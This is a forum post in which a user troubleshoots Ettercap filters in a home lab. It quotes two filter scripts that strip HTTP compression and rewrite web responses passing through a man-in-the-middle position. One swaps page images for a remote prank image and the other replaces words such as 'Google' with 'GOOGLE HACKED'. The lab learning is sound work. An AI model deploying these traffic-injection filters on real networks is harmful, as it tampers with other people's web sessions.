Ettercap Filter issue with Replace
Hi,
I have been pouring over the Internet and especially this forum the last few days to try to find an answer to my problem.
I see in the past many people have had issues with getting Ettercap Filters to work, and I guess I am now one of them
I just wanted to try the IronGeek Image Replacement script in my own Lab, which can be found here: http://www.irongeek.com/i.php?page=s...ettercapfilter
I'm running two VM's:
1. BT5 R3 Gnome 64 Bit (thought I have tried this now on BT4 R2, BT5, R2)
2. Windows XP SP2
The filter from the website is this one below:
Code:if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); }
With this one, no images are replaced however sometimes at the bottom of the page a line that might have a javascript src tag will be changed to the image link.
Wireshark shows that the TCP packets are coming in out of Order and calling for Retransmission. I can see inside that they are getting changed but - then it looks like a re-transmission occurs and they are getting replaced maybe?
I switched the script up some, and replaced it with one I found on this website to just change the Title Tag:
This one is even more interesting, as if a page has those keywords in it, I'll get a page cannot be displayed. On both I'm getting the msg's that the script is getting triggered.. /sighCode:if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { msg("in Second IF\n"); if (search(DECODED.data, "Hello")){ replace("Hello", "12345"); msg("run\n"); } if (search(DATA.data, "Google")){ replace("Google", "GOOGLE HACKED"); msg("run2\n"); } }
Any idea's?
I've uncommented the lines in etter.conf for the iptables.. I'm also only running ettercap with this, not sslstrip etc..
Thanks for any help you can provide
-DV
